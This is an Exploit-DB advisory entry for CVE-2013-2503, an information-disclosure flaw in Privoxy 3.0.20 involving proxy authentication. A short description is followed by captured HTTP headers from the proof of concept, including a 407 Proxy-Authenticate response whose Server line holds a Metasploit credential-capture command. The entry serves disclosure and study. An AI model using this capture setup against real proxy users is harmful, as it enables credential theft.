Privoxy Proxy Authentication Information Disclosure Vulnerabilities

2013-03-11T00:00:00
ID EDB-ID:38377
Type exploitdb
Reporter Chris John Riley
Modified 2013-03-11T00:00:00

Description

Privoxy Proxy Authentication Information Disclosure Vulnerabilities. CVE-2013-2503. Webapps exploit for php platform

                                        
                                            source: http://www.securityfocus.com/bid/58425/info

Privoxy is prone to multiple information-disclosure vulnerabilities.

Attackers can exploit these issues to gain access to the user accounts and potentially obtain sensitive information. This may aid in further attacks.

Privoxy 3.0.20 is affected; other versions may also be vulnerable. 

Response Code (current).: 407

Response Headers (as seen by your browser).:

HTTP/1.1 407 Proxy Authentication Required
Date: Mon, 11 Mar 2013 17:01:59 GMT
Server: ./msfcli auxiliary/server/capture/http set SRVPORT=80
Proxy-Authenticate: Basic
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 571
Keep-Alive: timeout=15, max=99
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

Request Headers (as seen by the remote website)

Host: c22.cc
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:19.0) Gecko/20100101 Firefox/19.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://www.example.com/
Connection: keep-alive